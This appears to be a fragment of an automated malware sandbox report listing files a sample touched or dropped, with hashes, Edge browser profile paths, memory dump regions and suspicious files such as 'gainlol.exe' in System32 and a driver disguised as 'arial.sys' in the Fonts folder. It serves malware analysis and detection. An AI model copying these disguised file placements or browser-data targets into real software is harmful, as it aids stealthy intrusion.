SHA1 01bf06badc5da353e539c7c07527d30dccc55a91
SHA256 bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa
SHA512 80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 65c20bdd4eb8f14964b28dfc4d0a6773
SHA1 072e35d6c38f81b6bfe03b4c69a251a4c2e691fb
SHA256 75191e827aed4adab9c9cffab8af12697001e638e69a165f4913ad2c19f60efe
SHA512 d0f7a509be8e03918db5a792af1a0ff8440a8b8e007b07ffe6a83fc4293cb981eaf3a3450e06d3ecd9cf19bda879226c5de9e6cf0951e76143497659b1a50228

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2aa3f89bf8ceae149183ec7b13d3b1c8
SHA1 2d79f8ad06aab48d390cd87cdc90ace9b6886a6b
SHA256 7d3d3319680d754de02eda14ec16317585e4f2fb86ceaa4c9da99fa23c3c2a9f
SHA512 6b5307e5116df523566b85de7337a063579b2c50dd815c7f8d03cc4b298bb56864273e63633937e7b154727d29d578e1dfac2763cbe6c278319fa10a1565aef9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a75a306c798be92962313a82e867581e
SHA1 608046ba43753fee98e349933fd26c01eb3f28f3
SHA256 5a11855473cae7c3149f7655fd4ba3a8675ca38fb81bcba2dfb0bc79bb11e8e2
SHA512 4de83eeb0e36b8263ecd1af76798c1aa95bf6cb57e04e827ccfbb93dd6f558340c75e76a93c83b25cb5acca114699ad620a46fb6405bca87e4ce803b19fcf58c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c352495e5e6d50640db63ac16db2c406
SHA1 120422b4ef3e0a5fa97783b370dfe22fe254cf47
SHA256 d1e121f5e5f3be47248e9973aed3669bc82b161627b3a622e060139098e4a3b6
SHA512 7691a97c81ffa63ec4199b5c89c7e2abad237ad17d422d8b040036f548869235651ebcbd75ba132a5fe070504d57c472f097cceee7700fa1bec2b4fbc90f26a8

memory/2368-166-0x00007FF703D45000-0x00007FF7040AE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 bca98d1cf3fe8e6f9e3aa8861ec4f2b4
SHA1 f746415ea8e413db5e07096f4aeb7a14dd78b706
SHA256 29054e1b14d297b31776563bf65250c6c6a750c8957f8c94e9368702ea37ed4f
SHA512 d0124575b26fbae936ccf20aa11a6d14d00d8b0df9e8c20a2a9d1c1bc6750ea1ea34b83deff2c07c571ae11e1c29a58aa05b3948e56ede9279134de367212fd7

memory/2368-174-0x00007FF703CB0000-0x00007FF70462B000-memory.dmp

C:\Windows\System32\gainlol.exe

MD5 e25351a9dd41d1c339530c465fe18569
SHA1 2461491598a2ab092b352f2caf375accde6e9d85
SHA256 d38d41c4ef8b4ded6ddcba4d290231dc0521e9900ecd71c1db90d103fe19d869
SHA512 888ab312cda4d811254ab56d73238fd4419a2c3a3d59fbce3dfabe466ccd9081927389acdc740c9414cd380a6fb42bd881b7105cb444321d38a2f728333dc9d1

C:\Windows\Fonts\arial.sys

MD5 334061e143b54efcbd9e17a51854dc02
SHA1 16bd1ab01326758ed4c7b0c7ac19847dc7bd6c58
SHA256 90fb91509b573966184a35ca1a23d212fb97fdb67b6a3e6ec881ed1cf5dba474
SHA512 fb4c7ec8b9a002bc03e3596cde7aa62d07d1e72d2ee587ba6044f6a66c765a1d610a83730589657fc2bdd5cb52521a02d9fdbce6ef92f3f91588775adf18ba72